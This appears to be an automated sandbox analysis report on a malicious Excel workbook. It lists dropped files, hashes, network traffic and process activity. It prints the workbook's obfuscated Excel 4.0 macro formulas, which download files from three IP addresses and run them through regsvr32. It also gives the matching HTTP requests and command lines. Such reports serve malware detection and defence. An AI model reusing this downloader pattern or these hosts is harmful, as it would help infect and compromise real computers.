    SHA-256:8F0BA1944993205B1285183670B3C0CC60C58A6334314A5DBF8D95A657792447
    SHA-512:3495B97EB263A1BCFE0E8C2231685C3769B0F446045CF137A1E2192FF3571AA74A7510BE563BEAB5EB3A3A24F6432A8219BF22643CC47DD049769A0D99E5293B
    Malicious:false
    Reputation:low
    Preview: ...n.0............n..C......@..X.,...&o_.I.-..{-|q.).~.....j...B..l\.X.V:..d..~.,.(...Y(.."..~.0yXy..E.X.....<........N.B#...9.B.....ht.....sL.l:..J<..n...v2.e...%T..FK.d.?Y...]Ui..........k.lL.&b..DJ,2.....~.MV.E..b.}.D.. ...Y..C]...&U....E'....N..).*._....b..8.M.lb.K..hKV4B.wk.....m_.:Bj##o?.....K..`..>...1BGn:........C...<,.|X.aq.........mX.x4...K..N..Oj........_.W.b.....k.S.Z.P.H.......}...9Y.....}#t.KS.]p>. ...._....{.....s.+zK.).?pg..4.)P{..../.......PK..........!.........W.......[Content_Types].xml ...(..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Jun 9 15:31:52 2021, atime=Wed Jun 9 15:31:52 2021, length=8192, window=hide
    Category:dropped
    Size (bytes):867
    Entropy (8bit):4.496944502991758
    Encrypted:false
    SSDEEP:12:85QMcLgXg/XAlCPCHaX2B8GB/z2vX+WnicvbSubDtZ3YilMMEpxRljK1TdJP9TdU:854/XTm6GUYepDv3qgrNru/
    MD5:DC4B2EA43C8A1B8FCCB693FFF4EC7510
    SHA1:D2D0868322033CE6050D25C557CA675BEF8E2158
    SHA-256:9D0AE1E5C75C2605B5ED927EE152290B375E2C7F89F387D09640D61A26AEE5E2
    SHA-512:2AC21BAF4FCCC6804E9D86752A54F408442E99B99C6094A4DD041E692C4A27E1641F44A7F8276AF000BA6AD2B4CA9F463ACF6D01D1B49438DE7CD4C17ACFA627
    Malicious:false
    Reputation:low
    Preview: L..................F...........7G..k.$.L]..k.$.L]... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\841618\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......841618..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\banUwVSwBY.LNK
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Jun 9 15:31:30 2021, mtime=Wed Jun 9 15:31:52 2021, atime=Wed Jun 9 15:31:52 2021, length=338387, window=hide
    Category:dropped
    Size (bytes):2038
    Entropy (8bit):4.597484485757477
    Encrypted:false
    SSDEEP:48:8nk/XTFGLGtN8ygQh2nk/XTFGLGtN8ygQ/:8nk/XJGLegQh2nk/XJGLegQ/
    MD5:DCC45B20DFAD34FDD5C231A3678E383E
    SHA1:11CB9B75BB747AC5ECB0E52D67EA215E20F341E3
    SHA-256:5CBFCF868BFAE09308FA59BD913ACDD63EB78D26CDF03513901A3C56BA37F638
    SHA-512:9EC1B4C9146FC170C28FA7B7FA035EA737AE61B05BB4ED83F4F4D333A811D461C52470B510B15B71B57290BC047235399804D7F0BB8D51339E524211BFA1A91B
    Malicious:false
    Reputation:low
    Preview: L..................F.... ......L]..k.$.L]...0..L]...)...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2.96...R.. .BANUWV~1.XLS..L.......R...R..*...Z.....................b.a.n.U.w.V.S.w.B.Y...x.l.s.x.......y...............-...8...[............?J......C:\Users\..#...................\\841618\Users.user\Desktop\banUwVSwBY.xlsx.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.b.a.n.U.w.V.S.w.B.Y...x.l.s.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......841618..........D_....3N...W...9F.C...........[D_....3N...W...9F
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):85
    Entropy (8bit):4.676175494579443
    Encrypted:false
    SSDEEP:3:oyBVomxWME32P2fiz2P2mxWME32P2v:djM32P6iz2PG32PI
    MD5:1A68CAC18E09A64F9C562750C73E1945
    SHA1:D0135E42FD06C773B58C580966C764EEFF9926D1
    SHA-256:202B7BFACE52B0948B2D7727B2475BF4E8AE9284772855A49838214CD697A555
    SHA-512:5E8E8225BD5BC72BE4D3B84E30385D70FEE4A6A2698724CC477FA4DDF0CDDB1118714F1967480B494BB200E8D75182BABC666978FC5B9B5BAC3F4992FEEB7617
    Malicious:false
    Reputation:low
    Preview: Desktop.LNK=0..[misc]..banUwVSwBY.LNK=0..banUwVSwBY.LNK=0..[misc]..banUwVSwBY.LNK=0..
    C:\Users\user\Desktop\D60F0000
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):338387
    Entropy (8bit):7.97982689727803
    Encrypted:false
    SSDEEP:6144:YS+RMlgE+mJ9ABc/nv5k8IKAhBfsOwmLgzLc1pTcsGEdDIPmhsB0vRakfzeQZN77:YS+RMmEv2Bc/nvm8IKABfsYOmauFf7
    MD5:9590ABBCDB9FA3F3853839CDF04B327E
    SHA1:667E70BED62ED48AE34F40A27DECC0C72B629864
    SHA-256:A2B393CBECBC9B16B94CD865027827DAF9432BDC6016256D5AEEF889A3EB3C51
    SHA-512:B7849DB640739D65C9E2968043948E1C26187CDC2F1471D0E9E055BD25462FC0EA73EB17076CF3BD9A5C438A302F26459D32C3EB465AC99B02A3E1A8F5B61A01
    Malicious:false
    Reputation:low
    Preview: ..N.0...x....-gVM....]$..L<i.&....}{.iA..A...M..g.o...o.m..B@.l!F.Pd`K.........JdH.j.8..X.......q..3..X........Z...`y.r.U.a*.*gj..d8........s....*..P.g..K.gcEv.\.....oL..A..k".WU.....S...(.5..M.a...D\...Q3@..DWU...am<...(..Um.#S..6v..(..w0.....O...9o...g.f.n......Rw.w.Qv..Ab}]..'.p.&.q...y"...p\&.q...u"..a* .....:R.......^ti..%H......L.O.V.........k.=.:... W....*..]6v..yd.....?.Z..xN...|Z.M..S..g..5;...j...e.'........PK..........!...#.............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    C:\Users\user\Desktop\~$banUwVSwBY.xls
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):165
    Entropy (8bit):1.4377382811115937
    Encrypted:false
    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
    MD5:797869BB881CFBCDAC2064F92B26E46F
    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
    Malicious:false
    Reputation:high, very likely benign file
    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    C:\Users\user\Desktop\~$banUwVSwBY.xlsx
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):330
    Entropy (8bit):1.4377382811115937
    Encrypted:false
    SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
    MD5:96114D75E30EBD26B572C1FC83D1D02E
    SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
    SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
    SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
    Malicious:false
    Reputation:high, very likely benign file
    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

    Static File Info

    General

    File type:Microsoft Excel 2007+
    Entropy (8bit):7.979985125691482
    TrID:
    • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
    • ZIP compressed archive (8000/1) 16.67%
    File name:banUwVSwBY.xlsx
    File size:341561
    MD5:da5fb469bc9385f16af43843673cadc8
    SHA1:414c25009dd7fad02b87f534779f6863a937aa93
    SHA256:612d8808903469c5840e8697710abe11a2c7e75ccad1e61de969732c42271249
    SHA512:c97f5e199408f49182300e715e279e1530e48f0588f0c2b6a93679097cd5641704ea899ef4842662749e67cf257a28243eff687f85908bafd051969b5e4e392d
    SSDEEP:6144:5qAgRMlgE+mJ9ABc/nv5k8IKAhBfsOwmLgzLc1pTcsGEdDIPmhsB0vRakfzeQZN1:5qAgRMmEv2Bc/nvm8IKABfsYOmauFZ
    File Content Preview:PK..........!...`.....W.......[Content_Types].xml ...(.........................................................................................................................................................................................................

    File Icon

    Icon Hash:e4e2aa8aa4b4bcb4

    Static OLE Info

    General

    Document Type:OpenXML
    Number of OLE Files:1

    OLE File "banUwVSwBY.xlsx"

    Indicators

    Has Summary Info:
    Application Name:
    Encrypted Document:
    Contains Word Document Stream:
    Contains Workbook/Book Stream:
    Contains PowerPoint Document Stream:
    Contains Visio Document Stream:
    Contains ObjectPool Stream:
    Flash Objects Count:
    Contains VBA Macros:

    Macro 4.0 Code

    "=FORMULA('2dfgv'!F13&'2dfgv'!E14,I9)"=GOTO('1rtgvrt'!J3)
    "=FORMULA('3fescvaer'!I10&'3fescvaer'!D15,H8)"=GOTO('5fetaert'!H6)
    =,,,,,,,EX,,,,,,,E,,,,"=FORMULA(K10&K11,I10)",,,=D9&D10,,,,,,,=D12"C(""regsvr",,,,,,,,,,,,,,,,,,,,,"32 -s ""&"".""&"".""&""\""&""Post.storg"")","32 -s ""&"".""&"".""&""\""&""Post.storg1"")","32 -s ""&"".""&"".""&""\""&""Post.storg2"")",,,,,,,,,,,,,,,,=GOTO('4scdac'!G3),,,,,,,,,,..\Post.storg,..\Post.storg1,..\Post.storg2,,,,,
    "=FORMULA('3fescvaer'!D8&'5fetaert'!I12,I18)"=GOTO('9rrvrv'!J11)
    "=FORMULA('3fescvaer'!D8&'6vrtgarga'!I14,J18)"=HALT()
    ,,,,"=CONCATENATE(G12,nowik!I9)",,,,,,,,,,"=FORMULA(J5,J11)",,,,,,,,,,=NOW(),,,,.dat,,,,,,,=,=F12&F13,,,,REGIS,,,,"=Kokiser(0,K13&I14&J9&I10,'3fescvaer'!D19,0,0)",=K16&K17&K18"TER(""u""&""R""&""l""&""M""&""o""&""n"",""URL",,,"=""190.14.37.134/""",,Download,,,"=""37.1.196.25/""","=Kokiser(0,K13&I15&J9&I10,'3fescvaer'!E19,0,0)",ToFile,,,"=""51.89.115.124/""",,"=""ht""""A"",""JJC""""&CBB"",""Koki",,,,"=Kokiser(0,K13&I16&J9&I10,'3fescvaer'!F19,0,0)",tp"ser"",,1,9)",,,,,"=""://""",,,,,,,,,,,,,,=GOTO('3fescvaer'!H4),
    "=FORMULA('3fescvaer'!D8&'4scdac'!H8,H13)"=GOTO('8aevgadrg'!I6)
    =GOTO(nowik!H4)
    "=FORMULA('3fescvaer'!I10&'3fescvaer'!F15,I14)"=GOTO('7rvgasdg'!H7)
    "=FORMULA('3fescvaer'!I10&'3fescvaer'!E15,I12)"=GOTO('6vrtgarga'!H7)
    ,='1rtgvrt'!F14=F14&F15,='1rtgvrt'!F15&'1rtgvrt'!F16,='1rtgvrt'!F17&'1rtgvrt'!F18

    Network Behavior

    Snort IDS Alerts

    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
    06/09/21-09:32:10.958517TCP1201ATTACK-RESPONSES 403 Forbidden8049167190.14.37.134192.168.2.22
    06/09/21-09:32:11.440661ICMP399ICMP Destination Unreachable Host Unreachable178.162.223.151192.168.2.22
    06/09/21-09:32:17.040656ICMP399ICMP Destination Unreachable Host Unreachable178.162.223.151192.168.2.22
    06/09/21-09:32:20.092660ICMP399ICMP Destination Unreachable Host Unreachable178.162.223.151192.168.2.22
    06/09/21-09:32:33.760719ICMP399ICMP Destination Unreachable Host Unreachable178.162.223.151192.168.2.22
    06/09/21-09:32:38.100515ICMP399ICMP Destination Unreachable Host Unreachable178.162.223.151192.168.2.22
    06/09/21-09:32:41.948607ICMP399ICMP Destination Unreachable Host Unreachable178.162.223.151192.168.2.22
    06/09/21-09:32:53.335395TCP1201ATTACK-RESPONSES 403 Forbidden804917051.89.115.124192.168.2.22

    Network Port Distribution

    TCP Packets

    TimestampSource PortDest PortSource IPDest IP
    Jun 9, 2021 09:32:09.944426060 CEST4916780192.168.2.22190.14.37.134
    Jun 9, 2021 09:32:10.153907061 CEST8049167190.14.37.134192.168.2.22
    Jun 9, 2021 09:32:10.154114008 CEST4916780192.168.2.22190.14.37.134
    Jun 9, 2021 09:32:10.155297995 CEST4916780192.168.2.22190.14.37.134
    Jun 9, 2021 09:32:10.364609003 CEST8049167190.14.37.134192.168.2.22
    Jun 9, 2021 09:32:10.958517075 CEST8049167190.14.37.134192.168.2.22
    Jun 9, 2021 09:32:10.958714008 CEST4916780192.168.2.22190.14.37.134
    Jun 9, 2021 09:32:10.982449055 CEST4916880192.168.2.2237.1.196.25
    Jun 9, 2021 09:32:13.991590977 CEST4916880192.168.2.2237.1.196.25
    Jun 9, 2021 09:32:19.997977018 CEST4916880192.168.2.2237.1.196.25
    Jun 9, 2021 09:32:32.049077034 CEST4916980192.168.2.2237.1.196.25
    Jun 9, 2021 09:32:35.053270102 CEST4916980192.168.2.2237.1.196.25
    Jun 9, 2021 09:32:41.059799910 CEST4916980192.168.2.2237.1.196.25
    Jun 9, 2021 09:32:53.105983019 CEST4917080192.168.2.2251.89.115.124
    Jun 9, 2021 09:32:53.154438019 CEST804917051.89.115.124192.168.2.22
    Jun 9, 2021 09:32:53.154634953 CEST4917080192.168.2.2251.89.115.124
    Jun 9, 2021 09:32:53.155843019 CEST4917080192.168.2.2251.89.115.124
    Jun 9, 2021 09:32:53.201317072 CEST804917051.89.115.124192.168.2.22
    Jun 9, 2021 09:32:53.335395098 CEST804917051.89.115.124192.168.2.22
    Jun 9, 2021 09:32:53.335481882 CEST4917080192.168.2.2251.89.115.124
    Jun 9, 2021 09:33:15.970829964 CEST8049167190.14.37.134192.168.2.22
    Jun 9, 2021 09:33:15.970920086 CEST4916780192.168.2.22190.14.37.134
    Jun 9, 2021 09:33:58.335932016 CEST804917051.89.115.124192.168.2.22
    Jun 9, 2021 09:33:58.336090088 CEST4917080192.168.2.2251.89.115.124
    Jun 9, 2021 09:34:09.847522974 CEST4917080192.168.2.2251.89.115.124
    Jun 9, 2021 09:34:09.847757101 CEST4916780192.168.2.22190.14.37.134
    Jun 9, 2021 09:34:09.895754099 CEST804917051.89.115.124192.168.2.22
    Jun 9, 2021 09:34:10.059724092 CEST8049167190.14.37.134192.168.2.22

    HTTP Request Dependency Graph

    • 190.14.37.134
    • 51.89.115.124

    HTTP Packets

    Session IDSource IPSource PortDestination IPDestination PortProcess
    0192.168.2.2249167190.14.37.13480C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    TimestampkBytes transferredDirectionData
    Jun 9, 2021 09:32:10.155297995 CEST0OUTGET /44356.3971392361.dat HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 190.14.37.134
    Connection: Keep-Alive
    Jun 9, 2021 09:32:10.958517075 CEST1INHTTP/1.1 403 Forbidden
    Server: nginx
    Date: Wed, 09 Jun 2021 07:32:10 GMT
    Content-Type: text/html
    Content-Length: 548
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


    Session IDSource IPSource PortDestination IPDestination PortProcess
    1192.168.2.224917051.89.115.12480C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    TimestampkBytes transferredDirectionData
    Jun 9, 2021 09:32:53.155843019 CEST2OUTGET /44356.3971392361.dat HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 51.89.115.124
    Connection: Keep-Alive
    Jun 9, 2021 09:32:53.335395098 CEST3INHTTP/1.1 403 Forbidden
    Server: nginx
    Date: Wed, 09 Jun 2021 07:29:07 GMT
    Content-Type: text/html
    Content-Length: 548
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


    Code Manipulations

    Statistics

    CPU Usage

    Click to jump to process

    Memory Usage

    Click to jump to process

    High Level Behavior Distribution

    Click to dive into process behavior distribution

    Behavior

    Click to jump to process

    System Behavior

    General

    Start time:09:31:47
    Start date:09/06/2021
    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    Wow64 process (32bit):false
    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Imagebase:0x13f1f0000
    File size:27641504 bytes
    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:09:32:36
    Start date:09/06/2021
    Path:C:\Windows\System32\regsvr32.exe
    Wow64 process (32bit):false
    Commandline:regsvr32 -s ..\Post.storg
    Imagebase:0xff980000
    File size:19456 bytes
    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:09:32:36
    Start date:09/06/2021
    Path:C:\Windows\System32\regsvr32.exe
    Wow64 process (32bit):false
    Commandline:regsvr32 -s ..\Post.storg1
    Imagebase:0xff980000
    File size:19456 bytes
    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:09:32:37
    Start date:09/06/2021
    Path:C:\Windows\System32\regsvr32.exe
    Wow64 process (32bit):false
    Commandline:regsvr32 -s ..\Post.storg2
    Imagebase:0xff980000
    File size:19456 bytes
    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Disassembly

    Code Analysis

    Reset < >